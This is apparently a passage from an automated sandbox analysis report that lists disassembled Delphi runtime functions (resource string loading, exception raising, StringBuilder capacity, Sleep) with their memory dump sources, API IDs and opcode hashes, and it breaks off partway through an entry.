                                                                                                  • @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,?,?,5002C1FA), ref: 5002C259
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$AfterBuilder@set_Capacity$qqriClassClassoConstruction$qqrp14Create$qqrp17MetaObjectObject@$bctr$qqrvStringSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1727176548-0
                                                                                                  • Opcode ID: 68ad4378320049a673c0ba78b27b0f3727ba377b8d7406c843f74b7b50d33d9b
                                                                                                  • Instruction ID: f4a9a15b8d1a87e593a23b1651af1a404b07da154b15add0f3e5161749c54f5b
                                                                                                  • Opcode Fuzzy Hash: 68ad4378320049a673c0ba78b27b0f3727ba377b8d7406c843f74b7b50d33d9b
                                                                                                  • Instruction Fuzzy Hash: E9E022B3B02481878300C6AE7C41A6676C78FC5570B188332B028CB385EB268C1603E2
                                                                                                  Function 500142F8 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,50014342,?,00000000), ref: 50014313
                                                                                                    • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                    • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                    • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50014342,?,00000000), ref: 50014322
                                                                                                    • Part of subcall function 500265AC: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265B6
                                                                                                    • Part of subcall function 500265AC: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265C6
                                                                                                    • Part of subcall function 500265AC: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265D1
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,50014342,?,00000000), ref: 50014327
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$StringUnicode$LoadRaise$AfterAsg$qqrr20CharClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFromInstance$qqruiLen$qqrr20List$qqrvMetaObjectResourceString$qqrp20StringpbiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 336146123-0
                                                                                                  • Opcode ID: 98ccc1d5f2630f6518c2775a4f6d229749f85d97b1d2f6e253096087c6293393
                                                                                                  • Instruction ID: ccdb1991516171cd19e0ef9f1dd462ec752cf41ca7ab63605b4c294a36c3ea3a
                                                                                                  • Opcode Fuzzy Hash: 98ccc1d5f2630f6518c2775a4f6d229749f85d97b1d2f6e253096087c6293393
                                                                                                  • Instruction Fuzzy Hash: 46E092341156C8EFE711DBA4ED62869B3B8EF94700F914563F90083661DA316F04D990
                                                                                                  Function 5002C360 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Sysutils@TStringBuilder@get_Capacity$qqrv.RTL120(?,?,5002CECE), ref: 5002C366
                                                                                                    • Part of subcall function 5002C39C: @System@@DynArrayLength$qqrv.RTL120(5002CEC3), ref: 5002C39F
                                                                                                  • @Sysutils@TStringBuilder@get_MaxCapacity$qqrv.RTL120(?,?,5002CECE), ref: 5002C37C
                                                                                                  • @Sysutils@TStringBuilder@get_MaxCapacity$qqrv.RTL120(?,?,5002CECE), ref: 5002C387
                                                                                                  • @Sysutils@TStringBuilder@set_Capacity$qqri.RTL120(?,?,5002CECE), ref: 5002C392
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringSysutils@$Builder@get_Capacity$qqrv$ArrayBuilder@set_Capacity$qqriLength$qqrvSystem@@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1916226493-0
                                                                                                  • Opcode ID: d0824a8af33cadbe3178f22280927c209b2c4cdd0f5c74774a72a4c6b9b60ecc
                                                                                                  • Instruction ID: 23260aa18dfd21666b53627013c0cc0a4d10d4ba6927f08ef2018b0f3389f9ba
                                                                                                  • Opcode Fuzzy Hash: d0824a8af33cadbe3178f22280927c209b2c4cdd0f5c74774a72a4c6b9b60ecc
                                                                                                  • Instruction Fuzzy Hash: 2EE0E223B135B2078720E9BCBCC188D41C84A280B030AAF77F805EB303E5A9CE8543C0
                                                                                                  Function 5003070C Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,50030756,?,00000000), ref: 50030727
                                                                                                    • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                    • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                    • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50030756,?,00000000), ref: 50030736
                                                                                                    • Part of subcall function 500265AC: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265B6
                                                                                                    • Part of subcall function 500265AC: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265C6
                                                                                                    • Part of subcall function 500265AC: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265D1
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,50030756,?,00000000), ref: 5003073B
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$StringUnicode$LoadRaise$AfterAsg$qqrr20CharClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFromInstance$qqruiLen$qqrr20List$qqrvMetaObjectResourceString$qqrp20StringpbiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 336146123-0
                                                                                                  • Opcode ID: 9adbf1e102df835a60131fb93e77b0ad724821b13bdac4217d23f11bd0adb454
                                                                                                  • Instruction ID: 7b96b98e3e44b9784b1c23c869ab84a684675366666c903ca15437983a838fae
                                                                                                  • Opcode Fuzzy Hash: 9adbf1e102df835a60131fb93e77b0ad724821b13bdac4217d23f11bd0adb454
                                                                                                  • Instruction Fuzzy Hash: 12E09234505588EFEB22DB90FD629AAB3A9EB59700FE10573F90083651DA317E00D9A0
                                                                                                  Function 500307FC Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,50030846,?,00000000), ref: 50030817
                                                                                                    • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                    • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                    • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50030846,?,00000000), ref: 50030826
                                                                                                    • Part of subcall function 500265AC: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265B6
                                                                                                    • Part of subcall function 500265AC: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265C6
                                                                                                    • Part of subcall function 500265AC: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265D1
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,50030846,?,00000000), ref: 5003082B
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$StringUnicode$LoadRaise$AfterAsg$qqrr20CharClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFromInstance$qqruiLen$qqrr20List$qqrvMetaObjectResourceString$qqrp20StringpbiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 336146123-0
                                                                                                  • Opcode ID: 6f18f2c73f444128e5a733a293f07d3ed2a7dced5cd209cccd8cd0d28c8d86e9
                                                                                                  • Instruction ID: 0fd73ecdc63e3906adab3347c8ca8083b58c1d45574116356cda35ff769876bc
                                                                                                  • Opcode Fuzzy Hash: 6f18f2c73f444128e5a733a293f07d3ed2a7dced5cd209cccd8cd0d28c8d86e9
                                                                                                  • Instruction Fuzzy Hash: D5E09234105688EFEB11DFA1EE6296AB3A9EB94740FA10573F90482651DE316E00D990
                                                                                                  Function 50030850 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,5003089A,?,00000000), ref: 5003086B
                                                                                                    • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                    • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                    • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,5003089A,?,00000000), ref: 5003087A
                                                                                                    • Part of subcall function 500265AC: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265B6
                                                                                                    • Part of subcall function 500265AC: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265C6
                                                                                                    • Part of subcall function 500265AC: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265D1
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,5003089A,?,00000000), ref: 5003087F
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$StringUnicode$LoadRaise$AfterAsg$qqrr20CharClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFromInstance$qqruiLen$qqrr20List$qqrvMetaObjectResourceString$qqrp20StringpbiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 336146123-0
                                                                                                  • Opcode ID: 801a26064422de4bee8b03e7eabf7526823dfbc5163cdb4573ffbdd956c762c3
                                                                                                  • Instruction ID: 375d69ef3d01049e605aa9f8fdfeda863f1c380b39b0ffaf094c9cd922885603
                                                                                                  • Opcode Fuzzy Hash: 801a26064422de4bee8b03e7eabf7526823dfbc5163cdb4573ffbdd956c762c3
                                                                                                  • Instruction Fuzzy Hash: A7E09B34105684DFFB12DB94ED7399A73A8EB54700F9105B3F90142651DE356E00D990
                                                                                                  Function 50030A34 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,50030A7E,?,00000000), ref: 50030A4F
                                                                                                    • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                    • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                    • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50030A7E,?,00000000), ref: 50030A5E
                                                                                                    • Part of subcall function 500265AC: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265B6
                                                                                                    • Part of subcall function 500265AC: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265C6
                                                                                                    • Part of subcall function 500265AC: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265D1
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,50030A7E,?,00000000), ref: 50030A63
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$StringUnicode$LoadRaise$AfterAsg$qqrr20CharClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFromInstance$qqruiLen$qqrr20List$qqrvMetaObjectResourceString$qqrp20StringpbiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 336146123-0
                                                                                                  • Opcode ID: f1687f117a903241ffaa1fa5060f16201b683147ee7a1374503e745b60fd8754
                                                                                                  • Instruction ID: 7528d12fff5074f310ed779a2ab25226a40bb15e629f8c4203f1ec9f173bc9b7
                                                                                                  • Opcode Fuzzy Hash: f1687f117a903241ffaa1fa5060f16201b683147ee7a1374503e745b60fd8754
                                                                                                  • Instruction Fuzzy Hash: BDE0D834105A88EFEB12DBE0FD729AAB7B9EB59700F914577F90083651DF316E00D991
                                                                                                  Function 50030DA0 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,50030DEA,?,00000000), ref: 50030DBB
                                                                                                    • Part of subcall function 5000D5D0: @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                    • Part of subcall function 5000D5D0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                    • Part of subcall function 5000D5D0: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                  • @Sysutils@Exception@$bctr$qqrx20System@UnicodeString.RTL120(00000000,50030DEA,?,00000000), ref: 50030DCA
                                                                                                    • Part of subcall function 500265AC: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500265B6
                                                                                                    • Part of subcall function 500265AC: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265C6
                                                                                                    • Part of subcall function 500265AC: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,?,?,500122EB,5850026B,5850026B,5850026B,A850017A), ref: 500265D1
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,50030DEA,?,00000000), ref: 50030DCF
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$System@@$StringUnicode$LoadRaise$AfterAsg$qqrr20CharClassClassoConstruction$qqrp14Create$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrx20FindFromInstance$qqruiLen$qqrr20List$qqrvMetaObjectResourceString$qqrp20StringpbiStringx20Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 336146123-0
                                                                                                  • Opcode ID: fe9f18572c1f18bd5478f3c50b2f1ca1082490e108775c7d732fa2d6dcab26f2
                                                                                                  • Instruction ID: e95919099a761305471392459d198913835e1fb163ce40832130d89749eb3eb0
                                                                                                  • Opcode Fuzzy Hash: fe9f18572c1f18bd5478f3c50b2f1ca1082490e108775c7d732fa2d6dcab26f2
                                                                                                  • Instruction Fuzzy Hash: A4E09234116688EFEB12DBE4FD72D9AB3E8FB54700F914563F90082651DA31BE00D990
                                                                                                  Function 5000212C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 22sleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • Sleep.KERNEL32(00000000,50003885), ref: 50002142
                                                                                                  • Sleep.KERNEL32(0000000A,00000000,50003885), ref: 5000215B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Sleep
                                                                                                  • String ID: LJP$LJP
                                                                                                  • API String ID: 3472027048-3339104776
                                                                                                  • Opcode ID: c164c85c6bd618db57c2144687f5cfb642152b2fc34a6d7309f96ec3fd8f8499
                                                                                                  • Instruction ID: 1f4c43393d7b9fdfd9f5fbbc5e004a109d874a1f633b2967da1b9418d077b2a2
